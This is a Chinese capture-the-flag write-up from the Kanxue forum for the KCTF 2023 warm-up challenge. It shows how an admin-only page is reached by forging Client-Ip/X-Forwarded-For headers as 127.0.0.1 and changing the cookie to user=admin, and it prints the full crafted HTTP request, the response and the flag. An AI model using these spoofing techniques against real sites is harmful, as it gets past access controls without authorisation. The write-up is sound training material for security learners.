-
-
[原创]KCTF 2023 签到题 生死较量 WP
-
发表于: 2023-9-11 09:56 1444
-
本题旨在伪造地址、伪造Cookie两种方式:
常见的修改本地地址的方式为:
1 2 3 4 | Client - Ip: 127.0 . 0.1 X - Forwarded - For: 127.0 . 0.1 Host: 127.0 . 0.1 Referer: 127.0 . 0.1 |
只有本地管理员才能访问本页面,Burp抓包修改即可,改了2处。
第1处为Cookie参数,改为user字段改为admin。
第2处为新增Client-Ip参数,值为127.0.0.1。
请求包如下:
1 2 3 4 5 6 7 8 9 10 11 | GET / HTTP / 1.1 Host: 643fb88e - b3fc - 471a - b374 - 1244304dda8f .node.kanxue.com: 81 User - Agent: Mozilla / 5.0 (Macintosh; Intel Mac OS X 10.15 ; rv: 109.0 ) Gecko / 20100101 Firefox / 117.0 Accept: text / html,application / xhtml + xml,application / xml;q = 0.9 ,image / avif,image / webp, * / * ;q = 0.8 Accept - Language: zh - CN,zh;q = 0.8 ,zh - TW;q = 0.7 ,zh - HK;q = 0.5 ,en - US;q = 0.3 ,en;q = 0.2 Accept - Encoding: gzip, deflate Connection: close Content - Length: 54 Cookie: user = admin; Client - Ip: 127.0 . 0.1 Upgrade - Insecure - Requests: 1 |
响应包如下,可看到已回显flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | HTTP / 1.1 200 OK Content - Length: 136 Content - Type : text / html Date: Mon, 11 Sep 2023 01 : 54 : 47 GMT Server: Apache / 2.4 . 7 (Ubuntu) Set - Cookie: user = guest Vary: Accept - Encoding X - Powered - By: PHP / 5.5 . 9 - 1ubuntu4 . 29 Connection: close <!DOCTYPE html> <html> <head> <title>天网管理员后台系统< / title> < / head> <meta charset = "utf-8" > flag{tdQvKTtPj7v1lbhkDPesHb} |
结果为:flag{tdQvKTtPj7v1lbhkDPesHb}
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
最后于 2023-9-11 09:58
被Delevy编辑
,原因:
赞赏
他的文章
看原图
赞赏
雪币:
留言: